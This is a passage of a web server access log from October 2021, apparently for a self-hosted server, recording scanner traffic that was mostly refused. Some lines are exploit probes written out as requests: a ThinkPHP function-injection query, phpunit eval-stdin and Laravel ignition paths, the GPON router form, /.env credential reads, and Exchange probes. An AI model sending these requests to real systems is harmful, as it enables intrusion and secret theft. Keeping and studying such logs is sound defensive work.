Safari/537.36" "-" [22/Oct/2021:05:45:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Oct/2021:05:45:55 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [22/Oct/2021:05:48:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [22/Oct/2021:05:49:59 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:05:50:00 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:06:03:50 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:06:03:50 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:06:12:29 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [22/Oct/2021:06:12:30 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [22/Oct/2021:06:12:30 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [22/Oct/2021:06:51:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [22/Oct/2021:07:29:58 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:08:05:23 +0000] 400 - GET http 64.22.31.253 "/" [Client 101.34.38.144] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:08:10:52 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.206.203] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:08:30:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Oct/2021:09:37:08 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [22/Oct/2021:09:37:08 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [22/Oct/2021:09:37:09 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [22/Oct/2021:10:34:26 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [22/Oct/2021:11:24:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.207.84] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Oct/2021:11:45:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.202.97] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:11:49:44 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:11:49:44 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:12:13:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 137.184.24.74] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17" "-" [22/Oct/2021:12:20:01 +0000] 444 - GET https opds.moralanimal.net "/" [Client 34.77.162.14] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [22/Oct/2021:12:22:49 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:12:26:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Oct/2021:12:43:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:12:57:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [22/Oct/2021:12:57:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [22/Oct/2021:12:57:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [22/Oct/2021:13:07:09 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.203.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:14:22:42 +0000] 444 - POST https 64.22.31.253 "/ecp/AG.js" [Client 178.211.60.42] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "-" [22/Oct/2021:14:51:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [22/Oct/2021:14:51:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [22/Oct/2021:14:54:20 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:14:59:37 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [22/Oct/2021:15:04:54 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [22/Oct/2021:15:24:40 +0000] 400 - POST http 64.22.31.253 "/" [Client 176.111.173.122] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0" "-" [22/Oct/2021:17:17:09 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:17:24:02 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:17:24:03 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:18:07:32 +0000] 444 - GET https localhost "/" [Client 109.248.6.91] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [22/Oct/2021:18:39:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.58] [Length 0] [Gzip -] "-" "-" [22/Oct/2021:18:39:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "-" "-" [22/Oct/2021:18:39:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [22/Oct/2021:19:21:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [22/Oct/2021:19:23:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Oct/2021:20:07:26 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:20:07:26 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:20:25:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [22/Oct/2021:20:33:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Oct/2021:20:37:35 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:20:42:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Oct/2021:20:42:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Oct/2021:20:42:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Oct/2021:20:42:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Oct/2021:20:42:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Oct/2021:20:42:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Oct/2021:21:58:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.38] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [22/Oct/2021:21:59:24 +0000] 400 - GET http 64.22.31.253 "/about.php" [Client 80.82.78.39] [Length 252] [Gzip -] "Mozilla/5.0" "-" [22/Oct/2021:21:59:30 +0000] 444 - GET https 64.22.31.253 "/about.php" [Client 80.82.78.39] [Length 0] [Gzip -] "Mozilla/5.0" "-" [22/Oct/2021:22:04:22 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.86.35.12] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [22/Oct/2021:22:17:34 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Oct/2021:22:44:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.78.39] [Length 252] [Gzip -] "Mozilla/5.0" "-" [22/Oct/2021:22:44:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.78.39] [Length 0] [Gzip -] "Mozilla/5.0" "-" [22/Oct/2021:23:42:44 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Oct/2021:23:46:18 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:23:46:18 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Oct/2021:23:56:45 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Oct/2021:00:58:26 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:28 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:29 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:31 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:31 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:31 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [23/Oct/2021:00:58:33 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:39 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:39 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:40 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:00:58:43 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [23/Oct/2021:01:41:45 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.202.219] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:01:50:09 +0000] 444 - GET https lndshark.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [23/Oct/2021:01:52:57 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Oct/2021:02:04:45 +0000] 400 - GET http 64.22.31.253 "/" [Client 81.69.251.184] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:02:09:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.156.194] [Length 0] [Gzip -] "-" "-" [23/Oct/2021:03:03:41 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.61] [Length 0] [Gzip -] "Go http package" "-" [23/Oct/2021:03:11:34 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [23/Oct/2021:03:23:10 +0000] 444 - GET https imap.moralanimal.net "/" [Client 34.96.130.26] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [23/Oct/2021:03:31:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 120.52.152.20] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [23/Oct/2021:04:34:13 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Oct/2021:04:43:54 +0000] 444 - GET https guacamole.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [23/Oct/2021:04:53:55 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [23/Oct/2021:04:58:47 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 34.221.85.48] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [23/Oct/2021:05:05:17 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.148] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:05:06:47 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:05:07:12 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:05:33:02 +0000] 444 - GET https io.moralanimal.net "/" [Client 61.135.15.183] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; Pixel 1 Build/OPD2.1672) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [23/Oct/2021:05:47:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.66] [Length 0] [Gzip -] "-" "-" [23/Oct/2021:05:50:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 120.52.152.20] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [23/Oct/2021:05:50:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.241.23] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [23/Oct/2021:05:59:46 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [23/Oct/2021:06:00:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Oct/2021:07:39:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Oct/2021:08:01:14 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Oct/2021:08:10:47 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.203.228] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:09:23:23 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [23/Oct/2021:09:24:45 +0000] 444 - GET https oauth.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [23/Oct/2021:09:50:31 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Oct/2021:10:37:23 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.17] [Length 0] [Gzip -] "Go http package" "-" [23/Oct/2021:11:36:38 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [23/Oct/2021:11:49:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.197.181] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:12:01:52 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 77.247.110.219] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [23/Oct/2021:12:08:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 54.151.12.226] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:12:18:26 +0000] 444 - GET https io.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [23/Oct/2021:12:21:29 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Oct/2021:12:42:56 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Oct/2021:12:49:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.19] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [23/Oct/2021:13:07:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.199.67] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:13:57:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Oct/2021:14:25:58 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [23/Oct/2021:14:27:08 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 34.212.203.86] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [23/Oct/2021:15:03:32 +0000] 400 - - https localhost "-" [Client 195.78.54.101] [Length 154] [Gzip -] "-" "-" [23/Oct/2021:17:00:57 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Oct/2021:17:07:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Oct/2021:20:25:42 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] 